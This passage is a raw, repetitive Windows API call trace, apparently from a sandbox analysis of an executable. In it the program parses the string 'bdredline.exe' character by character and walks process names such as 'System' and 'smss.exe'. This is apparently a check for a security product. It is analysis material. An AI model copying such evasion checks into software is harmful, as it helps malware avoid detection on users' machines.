lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.385] lstrlenA (lpString=",") returned 1 [0158.385] lstrcpynA (in: lpString1=0x40b018, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.385] lstrcmpiA (lpString1="d", lpString2=",") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="4", iMaxLength=1024 | out: lpString1="4") returned="4" [0158.385] lstrlenA (lpString="4") returned 1 [0158.385] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="5") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.385] lstrlenA (lpString="1") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="5", iMaxLength=1024 | out: lpString1="5") returned="5" [0158.385] lstrlenA (lpString="5") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.385] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.385] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.385] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.385] lstrcpynA (in: lpString1=0x432000, lpString2="line.exe,", iMaxLength=1024 | out: lpString1="line.exe,") returned="line.exe," [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="l", iMaxLength=1024 | out: lpString1="l") returned="l" [0158.385] lstrlenA (lpString="l") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.385] lstrlenA (lpString="0") returned 1 [0158.385] lstrcpynA (in: lpString1=0x40ac18, lpString2="l0", iMaxLength=1024 | out: lpString1="l0") returned="l0" [0158.385] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.386] lstrcmpiA (lpString1="l0", lpString2="0") returned 1 [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2="l", iMaxLength=1024 | out: lpString1="l") returned="l" [0158.386] lstrlenA (lpString="l") returned 1 [0158.386] lstrcpynA (in: lpString1=0x40a418, lpString2="l", iMaxLength=1024 | out: lpString1="l") returned="l" [0158.386] lstrlenA (lpString="l") returned 1 [0158.386] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.386] lstrlenA (lpString="1") returned 1 [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2="l", iMaxLength=1024 | out: lpString1="l") returned="l" [0158.386] lstrlenA (lpString="l") returned 1 [0158.386] lstrcpynA (in: lpString1=0x40ac18, lpString2="l", iMaxLength=1024 | out: lpString1="l") returned="l" [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.386] lstrlenA (lpString=",") returned 1 [0158.386] lstrcpynA (in: lpString1=0x40b018, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.386] lstrcmpiA (lpString1="l", lpString2=",") returned 1 [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2="5", iMaxLength=1024 | out: lpString1="5") returned="5" [0158.386] lstrlenA (lpString="5") returned 1 [0158.386] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="6") returned 1 [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.386] lstrlenA (lpString="1") returned 1 [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2="6", iMaxLength=1024 | out: lpString1="6") returned="6" [0158.386] lstrlenA (lpString="6") returned 1 [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.386] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.386] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.386] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.386] lstrcpynA (in: lpString1=0x432000, lpString2="ine.exe,", iMaxLength=1024 | out: lpString1="ine.exe,") returned="ine.exe," [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2="i", iMaxLength=1024 | out: lpString1="i") returned="i" [0158.386] lstrlenA (lpString="i") returned 1 [0158.386] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.386] lstrlenA (lpString="0") returned 1 [0158.386] lstrcpynA (in: lpString1=0x40ac18, lpString2="i0", iMaxLength=1024 | out: lpString1="i0") returned="i0" [0158.386] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.386] lstrcmpiA (lpString1="i0", lpString2="0") returned 1 [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2="i", iMaxLength=1024 | out: lpString1="i") returned="i" [0158.386] lstrlenA (lpString="i") returned 1 [0158.386] lstrcpynA (in: lpString1=0x40a418, lpString2="i", iMaxLength=1024 | out: lpString1="i") returned="i" [0158.387] lstrlenA (lpString="i") returned 1 [0158.387] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.387] lstrlenA (lpString="1") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="i", iMaxLength=1024 | out: lpString1="i") returned="i" [0158.387] lstrlenA (lpString="i") returned 1 [0158.387] lstrcpynA (in: lpString1=0x40ac18, lpString2="i", iMaxLength=1024 | out: lpString1="i") returned="i" [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.387] lstrlenA (lpString=",") returned 1 [0158.387] lstrcpynA (in: lpString1=0x40b018, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.387] lstrcmpiA (lpString1="i", lpString2=",") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="6", iMaxLength=1024 | out: lpString1="6") returned="6" [0158.387] lstrlenA (lpString="6") returned 1 [0158.387] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="7") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.387] lstrlenA (lpString="1") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="7", iMaxLength=1024 | out: lpString1="7") returned="7" [0158.387] lstrlenA (lpString="7") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.387] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.387] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.387] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.387] lstrcpynA (in: lpString1=0x432000, lpString2="ne.exe,", iMaxLength=1024 | out: lpString1="ne.exe,") returned="ne.exe," [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="n", iMaxLength=1024 | out: lpString1="n") returned="n" [0158.387] lstrlenA (lpString="n") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.387] lstrlenA (lpString="0") returned 1 [0158.387] lstrcpynA (in: lpString1=0x40ac18, lpString2="n0", iMaxLength=1024 | out: lpString1="n0") returned="n0" [0158.387] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.387] lstrcmpiA (lpString1="n0", lpString2="0") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="n", iMaxLength=1024 | out: lpString1="n") returned="n" [0158.387] lstrlenA (lpString="n") returned 1 [0158.387] lstrcpynA (in: lpString1=0x40a418, lpString2="n", iMaxLength=1024 | out: lpString1="n") returned="n" [0158.387] lstrlenA (lpString="n") returned 1 [0158.387] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.387] lstrlenA (lpString="1") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="n", iMaxLength=1024 | out: lpString1="n") returned="n" [0158.387] lstrlenA (lpString="n") returned 1 [0158.387] lstrcpynA (in: lpString1=0x40ac18, lpString2="n", iMaxLength=1024 | out: lpString1="n") returned="n" [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.387] lstrlenA (lpString=",") returned 1 [0158.387] lstrcpynA (in: lpString1=0x40b018, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.388] lstrcmpiA (lpString1="n", lpString2=",") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="7", iMaxLength=1024 | out: lpString1="7") returned="7" [0158.388] lstrlenA (lpString="7") returned 1 [0158.388] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="8") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.388] lstrlenA (lpString="1") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="8", iMaxLength=1024 | out: lpString1="8") returned="8" [0158.388] lstrlenA (lpString="8") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.388] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.388] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.388] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.388] lstrcpynA (in: lpString1=0x432000, lpString2="e.exe,", iMaxLength=1024 | out: lpString1="e.exe,") returned="e.exe," [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.388] lstrlenA (lpString="e") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.388] lstrlenA (lpString="0") returned 1 [0158.388] lstrcpynA (in: lpString1=0x40ac18, lpString2="e0", iMaxLength=1024 | out: lpString1="e0") returned="e0" [0158.388] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.388] lstrcmpiA (lpString1="e0", lpString2="0") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.388] lstrlenA (lpString="e") returned 1 [0158.388] lstrcpynA (in: lpString1=0x40a418, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.388] lstrlenA (lpString="e") returned 1 [0158.388] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.388] lstrlenA (lpString="1") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.388] lstrlenA (lpString="e") returned 1 [0158.388] lstrcpynA (in: lpString1=0x40ac18, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.388] lstrlenA (lpString=",") returned 1 [0158.388] lstrcpynA (in: lpString1=0x40b018, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.388] lstrcmpiA (lpString1="e", lpString2=",") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="8", iMaxLength=1024 | out: lpString1="8") returned="8" [0158.388] lstrlenA (lpString="8") returned 1 [0158.388] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="9") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.388] lstrlenA (lpString="1") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="9", iMaxLength=1024 | out: lpString1="9") returned="9" [0158.388] lstrlenA (lpString="9") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.388] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.388] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.389] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.389] lstrcpynA (in: lpString1=0x432000, lpString2=".exe,", iMaxLength=1024 | out: lpString1=".exe,") returned=".exe," [0158.389] lstrcpynA (in: lpString1=0x42e3a0, lpString2=".", iMaxLength=1024 | out: lpString1=".") returned="." [0158.389] lstrlenA (lpString=".") returned 1 [0158.389] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.389] lstrlenA (lpString="0") returned 1 [0158.389] lstrcpynA (in: lpString1=0x40ac18, lpString2=".0", iMaxLength=1024 | out: lpString1=".0") returned=".0" [0158.389] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.389] lstrcmpiA (lpString1=".0", lpString2="0") returned -1 [0158.389] lstrcpynA (in: lpString1=0x42e3a0, lpString2=".", iMaxLength=1024 | out: lpString1=".") returned="." [0158.389] lstrlenA (lpString=".") returned 1 [0158.389] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.389] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="10") returned 2 [0158.389] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.389] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="11") returned 2 [0158.389] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.389] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="12") returned 2 [0158.389] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.389] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="13") returned 2 [0158.389] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.389] wsprintfA (in: param_1=0x431000, param_2="%d" | out: param_1="1") returned 1 [0158.389] wsprintfA (in: param_1=0x432000, param_2="%d" | out: param_1="13") returned 2 [0158.389] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="14") returned 2 [0158.389] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3297712") returned 7 [0158.390] lstrcpyA (in: lpString1=0x33e508, lpString2="3297712" | out: lpString1="3297712") returned="3297712" [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="4") returned 1 [0158.390] lstrcpyA (in: lpString1=0x431800, lpString2="4" | out: lpString1="4") returned="4" [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="3303080") returned 7 [0158.390] lstrcpyA (in: lpString1=0x430800, lpString2="3303080" | out: lpString1="3303080") returned="3303080" [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="5384") returned 4 [0158.390] lstrcpyA (in: lpString1=0x431000, lpString2="5384" | out: lpString1="5384") returned="5384" [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="3297712") returned 7 [0158.390] lstrcpyA (in: lpString1=0x340df8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.390] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.390] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.390] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="1024") returned 4 [0158.390] lstrcpynA (in: lpString1=0x3405e8, lpString2="System", iMaxLength=1024 | out: lpString1="System") returned="System" [0158.390] lstrcpyA (in: lpString1=0x431400, lpString2="System" | out: lpString1="System") returned="System" [0158.390] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="-1") returned 2 [0158.390] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="3303080") returned 7 [0158.390] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.391] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="7") returned 1 [0158.391] lstrcpyA (in: lpString1=0x430000, lpString2="7" | out: lpString1="7") returned="7" [0158.391] wsprintfA (in: param_1=0x431c00, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="2") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="3") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="4") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="5") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="6") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="7") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="8") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="9") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.392] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="10") returned 2 [0158.392] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.392] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="11") returned 2 [0158.392] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.392] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="12") returned 2 [0158.392] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.392] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="13") returned 2 [0158.392] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.392] wsprintfA (in: param_1=0x431000, param_2="%d" | out: param_1="1") returned 1 [0158.392] wsprintfA (in: param_1=0x432000, param_2="%d" | out: param_1="13") returned 2 [0158.392] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="14") returned 2 [0158.392] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="0") returned 1 [0158.392] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3303096") returned 7 [0158.392] lstrcpyA (in: lpString1=0x33e508, lpString2="3303096" | out: lpString1="3303096") returned="3303096" [0158.392] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.392] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="264") returned 3 [0158.392] lstrcpyA (in: lpString1=0x431800, lpString2="264" | out: lpString1="264") returned="264" [0158.392] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.392] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="3303408") returned 7 [0158.393] lstrcpyA (in: lpString1=0x430800, lpString2="3303408" | out: lpString1="3303408") returned="3303408" [0158.393] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="336") returned 3 [0158.393] lstrcpyA (in: lpString1=0x431000, lpString2="336" | out: lpString1="336") returned="336" [0158.393] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="3303096") returned 7 [0158.393] lstrcpyA (in: lpString1=0x3405e8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.393] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.393] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.393] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.393] lstrcpynA (in: lpString1=0x3401e0, lpString2="smss.exe", iMaxLength=1024 | out: lpString1="smss.exe") returned="smss.exe" [0158.393] lstrcpyA (in: lpString1=0x431400, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0158.393] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="-1") returned 2 [0158.393] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="3303408") returned 7 [0158.393] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="9") returned 1 [0158.393] lstrcpyA (in: lpString1=0x430000, lpString2="9" | out: lpString1="9") returned="9" [0158.393] wsprintfA (in: param_1=0x431c00, param_2="%d" | out: param_1="1") returned 1 [0158.393] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.393] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="1") returned 1 [0158.393] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.393] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="2") returned 1 [0158.393] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.394] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="3") returned 1 [0158.394] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.394] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="4") returned 1 [0158.394] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.394] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="5") returned 1 [0158.394] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.394] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="6") returned 1 [0158.394] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.394] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="7") returned 1 [0158.394] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.394] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="8") returned 1 [0158.394] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.394] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="9") returned 1 [0158.394] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.394] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="10") returned 2 [0158.394] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.394] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="11") returned 2 [0158.394] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.395] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="12") returned 2 [0158.395] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.395] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="13") returned 2 [0158.395] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.395] wsprintfA (in: param_1=0x431000, param_2="%d" | out: param_1="1") returned 1 [0158.395] wsprintfA (in: param_1=0x432000, param_2="%d" | out: param_1="13") returned 2 [0158.395] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="14") returned 2 [0158.395] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="0") returned 1 [0158.395] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3303432") returned 7 [0158.395] lstrcpyA (in: lpString1=0x33e508, lpString2="3303432" | out: lpString1="3303432") returned="3303432" [0158.395] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.395] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="332") returned 3 [0158.395] lstrcpyA (in: lpString1=0x431800, lpString2="332" | out: lpString1="332") returned="332" [0158.395] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.395] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="3304192") returned 7 [0158.395] lstrcpyA (in: lpString1=0x430800, lpString2="3304192" | out: lpString1="3304192") returned="3304192" [0158.395] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.395] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.395] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.395] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.395] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.396] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.396] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="784") returned 3 [0158.396] lstrcpyA (in: lpString1=0x431000, lpString2="784" | out: lpString1="784") returned="784" [0158.396] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="3303432") returned 7 [0158.396] lstrcpyA (in: lpString1=0x3401e0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.396] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.396] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.396] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") 